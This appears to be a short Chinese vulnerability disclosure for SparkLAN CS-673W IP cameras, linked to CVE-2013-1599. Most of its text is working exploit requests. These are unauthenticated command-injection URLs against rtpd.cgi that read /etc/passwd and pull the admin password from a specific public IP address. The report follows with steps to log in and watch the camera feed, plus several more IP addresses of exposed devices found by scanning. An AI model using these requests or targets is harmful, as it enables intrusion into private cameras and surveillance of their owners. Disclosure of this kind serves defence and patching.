SparkLAN,台湾公司。
参考CVE-2013-1599,原漏洞主要涉及D-Link,本漏洞中的CS-673W同样中招,
该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。
1.查看/etc/passwd
http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd
2.获取摄像头密码
http://183.179.253.135/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount
3.远程监控
拿到密码后,以用户名admin登陆http://183.179.253.135/
4.如何证明这是通用?(漏洞特殊,请在漏洞确认后请删除该部分内容)
小范围扫描,可得:
http://59.149.83.240/
http://14.198.20.207/
……
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。